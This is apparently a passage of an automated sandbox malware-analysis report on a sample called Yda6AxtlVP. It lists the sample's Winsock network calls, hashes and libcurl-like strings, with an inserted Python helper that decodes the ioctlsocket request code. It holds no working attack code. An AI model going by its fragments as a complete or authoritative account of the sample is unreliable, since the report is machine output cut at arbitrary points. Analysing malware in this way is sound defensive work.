                                                    Control-flow Graph (legend: Executed / Not Executed) for the function at 00E1AA30; the graph image is not reproduced. Its basic blocks include the calls to socket, ioctlsocket and connect, plus internal calls to the sub-functions at e0e730, e0ea60, e0ebf0, e1af70, e0e760, e0e7c0 and e0e180.
                                                    APIs
                                                    • socket.WS2_32(FFFFFFFF,?,00000000), ref: 00E1AB9B
                                                    • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 00E1ABE4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: ioctlsocketsocket
                                                    • String ID:
                                                    • API String ID: 416004797-0
                                                    • Opcode ID: df2fa88ae7744525e0b69905d69d035eab699c5a9daa2405203bbd8ba7ede2e6
                                                    • Instruction ID: fe65bb1cd4300a0704e6423966e7f96c376b34aa5b7bafd1bcd013893272a10b
                                                    • Opcode Fuzzy Hash: df2fa88ae7744525e0b69905d69d035eab699c5a9daa2405203bbd8ba7ede2e6
                                                    • Instruction Fuzzy Hash: 80E1D3706053019BEB20CF14C885BBB77E5EF85318F086A3DF998AB291D775D884CB92
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID: FD %s:%d sclose(%d)
                                                    • API String ID: 2781271927-3116021458
                                                    • Opcode ID: eed5d8d2a6f3608460462593a7d20c505599508cd08128704a1f3aa613eedf6d
                                                    • Instruction ID: 4f4ba687d59571597d2720e85bdf50dd142a8b7047a92ca6f3bd71d3b0b2076e
                                                    • Opcode Fuzzy Hash: eed5d8d2a6f3608460462593a7d20c505599508cd08128704a1f3aa613eedf6d
                                                    • Instruction Fuzzy Hash: 64D05E3290A2206B89206599BC49C5F7BA8DECAF61B2A0958FD8077204D2209C1587F3
                                                    APIs
                                                    • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,00E1B29E,?,00000000,?,?), ref: 00E1B0BA
                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00E03C41,00000000), ref: 00E1B0C1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: ErrorLastconnect
                                                    • String ID:
                                                    • API String ID: 374722065-0
                                                    • Opcode ID: 4f27dca57f9ea44d53a7d468dfb8262c29f0593b24929292fa79a6149c8fff5d
                                                    • Instruction ID: ab352f01fe0d6b63febb7d83280fdfd441462864a502002e50858ba8753cc8b4
                                                    • Opcode Fuzzy Hash: 4f27dca57f9ea44d53a7d468dfb8262c29f0593b24929292fa79a6149c8fff5d
                                                    • Instruction Fuzzy Hash: 4101D836304200DBCA205A698884EEBB399FF8D368F040768F978A71E1D726ED908752
                                                    APIs
                                                    • gethostname.WS2_32(00000000,00000040), ref: 00E04AA5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: gethostname
                                                    • String ID:
                                                    • API String ID: 144339138-0
                                                    • Opcode ID: 0b260848586561708039bbad634ff45e1a87846980c36966c5b3167aa1eeae8c
                                                    • Instruction ID: 2f47a9cc86dfdf3397ef29b17b635c22625677199c902d1ab2fe609266aa334b
                                                    • Opcode Fuzzy Hash: 0b260848586561708039bbad634ff45e1a87846980c36966c5b3167aa1eeae8c
                                                    • Instruction Fuzzy Hash: AC51D1F06047019BEB309B25DF4976376E4AF5131DF54283DEA8AA66D1EB74E8C4CB02
                                                    APIs
                                                    • getsockname.WS2_32(?,?,00000080), ref: 00E1AFD1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: getsockname
                                                    • String ID:
                                                    • API String ID: 3358416759-0
                                                    • Opcode ID: 44385031b230b450108acbaf65b4983373beb7110e7b9c381b66af96beee1f08
                                                    • Instruction ID: b1a0d36672dc9159b3e21a8fa1dacf261c579f22035d464169ec943e8b47abf1
                                                    • Opcode Fuzzy Hash: 44385031b230b450108acbaf65b4983373beb7110e7b9c381b66af96beee1f08
                                                    • Instruction Fuzzy Hash: 49119670908785D5EB268F18D4027F6B3F4EFD4329F109618E59952150F7329AC68BC2
                                                    APIs
                                                    • send.WS2_32(?,?,?,00000000,00000000,?), ref: 00E1A97E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: send
                                                    • String ID:
                                                    • API String ID: 2809346765-0
                                                    • Opcode ID: b63c166cf1d31c9b11350e2cd4cb555feed2cb10e8b6f05e457050c954cb13f7
                                                    • Instruction ID: aa8f6b750bcd1bf4b23d0d66704fabbc0b56157b14391ea5f8e73c0e634372b8
                                                    • Opcode Fuzzy Hash: b63c166cf1d31c9b11350e2cd4cb555feed2cb10e8b6f05e457050c954cb13f7
                                                    • Instruction Fuzzy Hash: E501A7717017109FC6148F15DC45BAAB7A5EFC4720F0A8569E9982B361C331AC518BD1
                                                    APIs
                                                    • socket.WS2_32(?,00E1B280,00000000,-00000001,00000000,00E1B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 00E1AF67
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: socket
                                                    • String ID:
                                                    • API String ID: 98920635-0
                                                    • Opcode ID: f2bb0e0553ae29237eed697e2dfeb62b73c9673a602c52de028a3554bef26ded
                                                    • Instruction ID: d25cc84f65ecb00f7e9507187f1814ac27d267d7b34dde1ab30ed4623f9e1b7b
                                                    • Opcode Fuzzy Hash: f2bb0e0553ae29237eed697e2dfeb62b73c9673a602c52de028a3554bef26ded
                                                    • Instruction Fuzzy Hash: 7EE0EDB6A092216BD654DA18E8449ABF369EFC8B20F055A59B86467204C330AC918BE2
                                                    APIs
                                                    • closesocket.WS2_32(?,00E19422,?,?,?,?,?,?,?,?,?,?,?,w3,01241600,00000000), ref: 00E1B04D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: closesocket
                                                    • String ID:
                                                    • API String ID: 2781271927-0
                                                    • Opcode ID: f2f4eb3f664015cd3f2f270ab39083a38f9b4af85d36d1ee82d4220a6addc2b9
                                                    • Instruction ID: e3b935a1b1c3a71e899561903d5dddfedeaa122c31d8dc21b85a6c23f44bf11d
                                                    • Opcode Fuzzy Hash: f2f4eb3f664015cd3f2f270ab39083a38f9b4af85d36d1ee82d4220a6addc2b9
                                                    • Instruction Fuzzy Hash: A4D0C23430020197CA208A14C884A97722B7FC8314FA8DB68E02C8A150C73BCC838601
                                                    APIs
                                                    • ioctlsocket.WS2_32(?,8004667E,?,?,00D8AF56,?,00000001), ref: 00DB67FC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: ioctlsocket
                                                    • String ID:
                                                    • API String ID: 3577187118-0
                                                    • Opcode ID: 03acd2284b38e07e758f7ff7c5ff990d0e05f9703754bb4932fdbf2e60f45488
                                                    • Instruction ID: 51c6bd8fe0380b492677a0af7bca241a7374fac25c3ee312101794ca8da7ecb7
                                                    • Opcode Fuzzy Hash: 03acd2284b38e07e758f7ff7c5ff990d0e05f9703754bb4932fdbf2e60f45488
                                                    • Instruction Fuzzy Hash: 26C012F1118101EFC60C8714D895A6F76D9DB85355F01582CB04681180EA305990CA16
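The ioctlsocket call above passes the request code 8004667E. That value is not opaque: Winsock builds socket ioctl codes with the BSD-style _IOR/_IOW macros, so the code can be taken apart into direction, argument size, group letter and command number, which identifies it as FIONBIO (switching the socket to non-blocking mode, the usual prelude to a connect-with-timeout or select loop in an HTTP client). The following decoder is an added triage helper, not code from the report or from the sample; the API-line format it parses is the one printed in the "APIs" bullets above, and the `?` placeholders are treated as unresolved arguments.

```python
"""Decode the request code passed to ioctlsocket() in a sandbox API trace.

Added triage helper; not part of the Joe Sandbox report or of the sample.
Winsock codes follow <winsock2.h>: bit 31 = IOC_IN (caller passes data in),
bit 30 = IOC_OUT (caller gets data back), bits 16-22 = sizeof(parameter)
masked with IOCPARM_MASK (0x7f), bits 8-15 = group letter, bits 0-7 = number.
"""
import re
from dataclasses import dataclass
from typing import Optional

IOC_VOID = 0x20000000
IOC_OUT = 0x40000000
IOC_IN = 0x80000000
IOCPARM_MASK = 0x7F


def make_ioctl(direction: int, size: int, group: str, number: int) -> int:
    """Mirror of _IO/_IOR/_IOW: rebuild a code from its parts."""
    return direction | ((size & IOCPARM_MASK) << 16) | (ord(group) << 8) | number


# Well-known codes, rebuilt from the macro definitions so the table and the
# decoder cannot drift apart.  All take a 4-byte u_long argument.
KNOWN = {
    make_ioctl(IOC_IN, 4, "f", 126): ("FIONBIO", "set or clear non-blocking mode"),
    make_ioctl(IOC_OUT, 4, "f", 127): ("FIONREAD", "bytes available to read"),
    make_ioctl(IOC_IN, 4, "f", 125): ("FIOASYNC", "toggle async I/O notification"),
    make_ioctl(IOC_OUT, 4, "s", 7): ("SIOCATMARK", "positioned at OOB mark"),
}


@dataclass
class IoctlCode:
    raw: int
    direction: str
    size: int
    group: str
    number: int
    name: str
    meaning: str


def decode_ioctl(code: int) -> IoctlCode:
    if code & IOC_IN and code & IOC_OUT:
        direction = "inout"
    elif code & IOC_IN:
        direction = "in"
    elif code & IOC_OUT:
        direction = "out"
    elif code & IOC_VOID:
        direction = "void"
    else:
        direction = "unknown"
    name, meaning = KNOWN.get(code, ("unknown", "not in table"))
    return IoctlCode(code, direction, (code >> 16) & IOCPARM_MASK,
                     chr((code >> 8) & 0xFF), code & 0xFF, name, meaning)


@dataclass
class ApiCall:
    function: str
    module: str
    args: list   # int for hex values, str for other literals, None for '?'
    ref: int     # address of the call site


_API_LINE = re.compile(r"^(\w+)\.(\w+)\((.*)\),\s*ref:\s*([0-9A-Fa-f]+)$")


def parse_api_line(line: str) -> ApiCall:
    """Parse one 'APIs' bullet ('func.module(args), ref: addr'); bullet optional."""
    m = _API_LINE.match(line.strip().lstrip("• ").strip())
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    func, module, raw_args, ref = m.groups()
    args = []
    for a in (x.strip() for x in raw_args.split(",")):
        if a == "?":
            args.append(None)
        elif re.fullmatch(r"[0-9A-Fa-f]+", a):   # hex-looking literals are numbers
            args.append(int(a, 16))
        else:
            args.append(a)                        # e.g. the 'w3' string above
    return ApiCall(func, module, args, int(ref, 16))


def analyze_ioctl_call(line: str) -> Optional[IoctlCode]:
    """For an ioctlsocket() line, decode its second argument (the command)."""
    call = parse_api_line(line)
    if call.function != "ioctlsocket" or len(call.args) < 2:
        return None
    cmd = call.args[1]
    return decode_ioctl(cmd) if isinstance(cmd, int) else None


# Lines copied from the report entries above.
IOCTL_LINE = "ioctlsocket.WS2_32(?,8004667E,?,?,00D8AF56,?,00000001), ref: 00DB67FC"
CLOSE_LINE = ("closesocket.WS2_32(?,00E19422,?,?,?,?,?,?,?,?,?,?,?,w3,01241600,"
              "00000000), ref: 00E1B04D")

if __name__ == "__main__":
    c = analyze_ioctl_call(IOCTL_LINE)
    print(f"{c.raw:#010x}: {c.name} ({c.direction}, {c.size}-byte arg, "
          f"group {c.group!r}, #{c.number}) - {c.meaning}")
```

Only the second argument is decoded; the remaining values in the bullet are whatever the sandbox captured from the stack and should not be read as the FIONBIO flag without checking the disassembly at the `ref` address.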
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 83797449e460b270d351d8a51689483d9d7eea5a97ee0e9db3b42bb0de5e9859
                                                    • Instruction ID: 23a9c25c80b5818aa4261e82057fdedcd0cdb5fd567e7fd4af2ef3c55e9396f0
                                                    • Opcode Fuzzy Hash: 83797449e460b270d351d8a51689483d9d7eea5a97ee0e9db3b42bb0de5e9859
                                                    • Instruction Fuzzy Hash: 853192B49197059BCB00EFB8D5846AEBBF4BF54345F00896DE898E7340E6349A48CF52
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: Sleep
                                                    • String ID:
                                                    • API String ID: 3472027048-0
                                                    • Opcode ID: f2f774c1e603b8d2c94598f02fd33f9cf9df019256a385d1dcddee70a9c051c0
                                                    • Instruction ID: 46936bc3bb97bca1d0bd04baaeb745ce87d5a219e2253e8956f63442da9e3173
                                                    • Opcode Fuzzy Hash: f2f774c1e603b8d2c94598f02fd33f9cf9df019256a385d1dcddee70a9c051c0
                                                    • Instruction Fuzzy Hash: 8FC04CE0C1474446D740BA38858615E7AE47781104FC11E69998496195F668D7188667
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                    • API String ID: 0-1371176463
                                                    • Opcode ID: 9536737d79691d12835883182f463e4bda9e5397d5345837f83b4147d8daa42f
                                                    • Instruction ID: f6b372eab4f781d7b4260bda25e59fd419a6de42abacd5b949b244b3c43bd78e
                                                    • Opcode Fuzzy Hash: 9536737d79691d12835883182f463e4bda9e5397d5345837f83b4147d8daa42f
                                                    • Instruction Fuzzy Hash: EEB21675A08341BBEF24AE65DC46B76BBE4AF55704F08452CEC8997282F771EC048772
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                    • API String ID: 0-122532811
                                                    • Opcode ID: 862d377f4d0b14b04c34d2f03a53fce113d027a4b0ea1ebe365aa0eca6f8970b
                                                    • Instruction ID: b4aae6d3804633651e0f396ae3167bee3c458a306b8b3a4eeb0e3a3b2e6c51b5
                                                    • Opcode Fuzzy Hash: 862d377f4d0b14b04c34d2f03a53fce113d027a4b0ea1ebe365aa0eca6f8970b
                                                    • Instruction Fuzzy Hash: 9C42D771B08701AFD718DE28CC81B6BB6E6EFC4704F048A2CF59997391D775E8548BA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -vc$ans$ate$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                    • API String ID: 0-1574211403
                                                    • Opcode ID: 3a5c1466fdee0ee7ceb0622bc67749f864e33bbe7e5b768770ef0d7ee4195f0e
                                                    • Instruction ID: b3ce1bc59d91877af81c402d767ad3b830e560aea9ae63e54551a16d9dec6202
                                                    • Opcode Fuzzy Hash: 3a5c1466fdee0ee7ceb0622bc67749f864e33bbe7e5b768770ef0d7ee4195f0e
                                                    • Instruction Fuzzy Hash: E161FDB5A0830067E714AA20AC52B7BB2D99BD5318F44A43DFC4AB63D3FA71DD84C653
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                                    • API String ID: 0-1914377741
                                                    • Opcode ID: 7e9e4941f24ed43baca892c80cfdfbee9d801418d97cbc95ce3eac56abcfe08f
                                                    • Instruction ID: c9c53fb573457aadbc7c1768fe0870ce3afe40470def55605f9837e670d95006
                                                    • Opcode Fuzzy Hash: 7e9e4941f24ed43baca892c80cfdfbee9d801418d97cbc95ce3eac56abcfe08f
                                                    • Instruction Fuzzy Hash: 06721830608B419BE7358A28E4467A677D29F91344F48C61CEDCD4B29AF7F6D884C763
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $.$;$?$?$xn--$xn--
                                                    • API String ID: 0-543057197
                                                    • Opcode ID: 816f81206ed563def028d06aef971d8c3aa3902bf81c3882c184893ecc023162
                                                    • Instruction ID: d3ce8577a1d5460d3c2890f4d16bdafa251875b71098d89d475ca96ceb676b8f
                                                    • Opcode Fuzzy Hash: 816f81206ed563def028d06aef971d8c3aa3902bf81c3882c184893ecc023162
                                                    • Instruction Fuzzy Hash: D822D4B2A04301ABEB209A249C41BEB76E5AF94348F04553CF899B7293E775DD84C7D2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $d$nil)
                                                    • API String ID: 0-394766432
                                                    • Opcode ID: 97b97b246d5235f013c49be2fdd8be987ef910b490da269197193b96332236b8
                                                    • Instruction ID: 08016a0e7b5a821bbd4e2d75121fb2c55a50e746df56be71d84062c7bf334913
                                                    • Opcode Fuzzy Hash: 97b97b246d5235f013c49be2fdd8be987ef910b490da269197193b96332236b8
                                                    • Instruction Fuzzy Hash: DB139B706083428FD760DF29C08466ABBE1BFC9714F1489ADFAD58B3A5D771E845CB82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                    • API String ID: 0-2555271450
                                                    • Opcode ID: 73779809b72d2fcac512bf0ae70616a63cd689bbea8e12ad0dfcbbefb629b2ab
                                                    • Instruction ID: a121b74caf3937c8823ce1357e4cca34d30ed5c3f143b28393b238cf238ba939
                                                    • Opcode Fuzzy Hash: 73779809b72d2fcac512bf0ae70616a63cd689bbea8e12ad0dfcbbefb629b2ab
                                                    • Instruction Fuzzy Hash: 11C280316087518FCB14CE28C49066AB7E2FFC8325F19892EECD99B355D770ED498B92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                                    • API String ID: 0-2555271450
                                                    • Opcode ID: 5549a2033f6137846cb515fe58f85e52888c6f3a00e872e438b290f9aff55319
                                                    • Instruction ID: 7556e4d516485d6a2cf1f948685bfcf858c1d7fbf46bc2f88c2b0ecfff4d7e67
                                                    • Opcode Fuzzy Hash: 5549a2033f6137846cb515fe58f85e52888c6f3a00e872e438b290f9aff55319
                                                    • Instruction Fuzzy Hash: 75828271A083019FDB14DF29C48072BB7E1AFD5325F188A2DECE99B291D730DD498B62
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: default$login$macdef$machine$netrc.c$password
                                                    • API String ID: 0-1043775505
                                                    • Opcode ID: ab71600df0f1d1a6b1555c717e2ca804ba8afd8464d0f57e33af6fc40fa9532c
                                                    • Instruction ID: f220e86b6d705ae3fd61d7e8168dae432306e602d5c90dd6459db31fb7566ac1
                                                    • Opcode Fuzzy Hash: ab71600df0f1d1a6b1555c717e2ca804ba8afd8464d0f57e33af6fc40fa9532c
                                                    • Instruction Fuzzy Hash: 72E1D270908351DBE7119E2598857AB7BE4AF85708F1C442CF8C657382E7BDD948CBB2
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID: FreeTable
                                                    • String ID: 127.0.0.1$::1
                                                    • API String ID: 3582546490-3302937015
                                                    • Opcode ID: 87ed73e14f7cc93900eea2428f7ab7b4faa819611b07cd202c123732cc529ea5
                                                    • Instruction ID: a19f925359103764c3a450d9ac2f44b0921dadd8f51df7f5adc9e80b8253c197
                                                    • Opcode Fuzzy Hash: 87ed73e14f7cc93900eea2428f7ab7b4faa819611b07cd202c123732cc529ea5
                                                    • Instruction Fuzzy Hash: 1BA1E971D04342ABE710DF25C8557AAB3E0BF95304F15A629F848AB262F771EDD0C792
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
                                                    • API String ID: 0-4201740241
                                                    • Opcode ID: e3fa017688be0352409521813c93173c5a5f15786354fdcac9a20237e9aeabd1
                                                    • Instruction ID: 4823ea7cce9dd6f744c8b180bfe6a560938f8c1b46acd3a2a8058f0d56ee765e
                                                    • Opcode Fuzzy Hash: e3fa017688be0352409521813c93173c5a5f15786354fdcac9a20237e9aeabd1
                                                    • Instruction Fuzzy Hash: 8962D0B0914741DBD714DF24C490BAAB7F4FF98304F04961EE8898B352E774EA94CBA6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
                                                    • API String ID: 0-2839762339
                                                    • Opcode ID: 74031a06c8b6e6d0a1e098421ba06f13743cb212dbc55229472496d8fe3cc6ef
                                                    • Instruction ID: 8683192a183c8ffd7805cd57fb23d67777ffc5fc344c4049b86292eda8f5426c
                                                    • Opcode Fuzzy Hash: 74031a06c8b6e6d0a1e098421ba06f13743cb212dbc55229472496d8fe3cc6ef
                                                    • Instruction Fuzzy Hash: A902FDF16043419FE7659F29D8407ABBBD4BFA4310F04886DEAC98B251E771E904C793
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .$@$gfff$gfff
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000003.1420543487.0000000001D7F000.00000004.00000020.00020000.00000000.sdmp, Offset: 01D7F000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_3_1d7f000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .12$M 0.$NT L
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: -----END PUBLIC KEY-----$-----BEGIN PUBLIC KEY-----$vtls/vtls.c
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1451008904.0000000000D51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_d50000_Yda6AxtlVP.jbxd
                                                    Similarity
                                                    • API ID:
